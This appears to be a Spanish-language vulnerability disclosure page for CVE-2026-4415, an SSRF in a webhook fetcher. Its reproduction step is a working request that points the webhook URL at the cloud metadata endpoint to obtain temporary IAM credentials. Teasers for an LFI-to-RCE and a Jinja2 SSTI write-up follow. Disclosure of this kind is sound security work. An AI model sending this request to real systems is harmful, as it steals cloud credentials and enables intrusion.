HighCVE-2026-4415CWE-918A10:2021 SSRF
SSRF en el fetcher de webhooks alcanza el metadata endpoint
Disclosure basisAlready public vulnerabilityCVE-2026-4415
Nova Ibáñez@n0va
0
Community vote7.7
High
CVSS 3.1 base score
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
// Executive summary
La URL de webhook no filtra rangos internos; apuntando a <code>169.254.169.254</code> se obtienen credenciales IAM temporales.
// Reproduction steps
POST /settings/webhook url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
-> devuelve AccessKeyId / SecretAccessKey / Token
More from @n0va
Writeup8.2 PASSKEY
Máquina HTB 'Vault' — cadena LFI a RCE y pivot a root
On HackTheBox
Passkey-protected content. Open the writeup and enter the key to read it.
Writeup9.8
SSTI a RCE en ACME Portal vía plantillas Jinja2
On ACME
El parámetro name del render de plantillas se evalúa server-side sin sandbox, permitiendo ejecución remota de código con una expresión Jinja2.
Comments
0